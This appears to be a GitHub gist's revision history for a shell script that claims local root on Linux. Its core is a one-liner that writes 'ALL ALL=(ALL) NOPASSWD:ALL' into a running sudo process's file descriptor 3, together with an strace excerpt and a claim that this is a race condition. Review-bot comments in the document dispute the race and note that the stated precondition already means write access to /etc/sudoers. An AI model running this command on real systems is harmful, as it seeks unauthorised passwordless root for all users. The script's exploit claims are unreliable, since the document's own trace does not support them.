@oxagast
Last active November 14, 2019 07:20

Revisions

  1. Marshall Whittaker revised this gist Nov 3, 2019. 1 changed file with 22 additions and 0 deletions.
    22 changes: 22 additions & 0 deletions sudo_erroot.sh
    @@ -6,4 +6,26 @@
    # descriptor 3 it gives you root!
    # Cavets: sudo must be running asking for a password at the time.
    # you must have write permission to 3.
    #
    # Race condition between when getting the uid of sudo and the
    # setresuid and openat() syscall before being reset to 0 here.
    #
    # --- SNIP ---
    # getresuid([0], [0], [0]) = 0
    # getresgid([0], [0], [0]) = 0
    # openat(AT_FDCWD, "/etc/nsswitch.conf", O_RDONLY) = 3
    # fstat(3, {st_mode=S_IFREG|0644, st_size=556, ...}) = 0
    # read(3, "# /etc/nsswitch.conf\n#\n# Example"..., 4096) = 556
    # read(3, "", 4096) = 0
    # close(3) = 0
    # setresuid(-1, 1, -1) = 0
    # stat("/etc/sudoers", {st_mode=S_IFREG|0440, st_size=39, ...}) = 0
    # openat(AT_FDCWD, "/etc/sudoers", O_RDONLY) = 3
    # fstat(3, {st_mode=S_IFREG|0440, st_size=39, ...}) = 0
    # read(3, "root ALL=(ALL) ALL\n%sudo ALL=(AL"..., 4096) = 39
    # lseek(3, 0, SEEK_SET) = 0
    # fcntl(3, F_SETFD, FD_CLOEXEC) = 0
    # setresuid(-1, 0, -1) = 0
    # --- SNIP ---

    echo "ALL ALL=(ALL) NOPASSWD:ALL" > /proc/`pgrep sudo`/fd/3
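    Review bot: the added comment calls this a race condition, but the strace excerpt under it is a sequential trace of a single process and shows no window in which a second actor gains access. In the trace, fd 3 is opened with O_RDONLY on /etc/sudoers, whose stat line reports mode 0440, between setresuid(-1, 1, -1) and setresuid(-1, 0, -1). Writing through /proc/<pid>/fd/3 opens the underlying file again and is checked against that file's permissions, so the existing caveat "you must have write permission to 3" amounts to already being able to write /etc/sudoers. Suggest either dropping the race-condition wording or documenting the concrete precondition together with the sudo version and platform this was observed on. The comment should also say which open it means, since fd 3 refers to /etc/nsswitch.conf earlier in the same trace.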
  2. Marshall Whittaker created this gist Nov 1, 2019.
    9 changes: 9 additions & 0 deletions sudo_erroot.sh
    @@ -0,0 +1,9 @@
    # oxagast / Marshall Whittaker
    #
    # The echo line uses sudoers file format to allow for everyone to
    # use the root account and writes it to proc/23423/fd/3 (where
    # the number is sudo's process. If you have write access to file
    # descriptor 3 it gives you root!
    # Cavets: sudo must be running asking for a password at the time.
    # you must have write permission to 3.
    echo "ALL ALL=(ALL) NOPASSWD:ALL" > /proc/`pgrep sudo`/fd/3
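    Review bot: the header states "it gives you root!" without saying which file descriptor 3 refers to or what privilege is needed to write to it, so a reader cannot judge the real precondition from the two caveat lines; name the file and the required permissions explicitly. Smaller points in the same comment block: "proc/23423/fd/3" is missing its leading slash, the parenthesis opened at "(where" is never closed, and "Cavets" should be "Caveats".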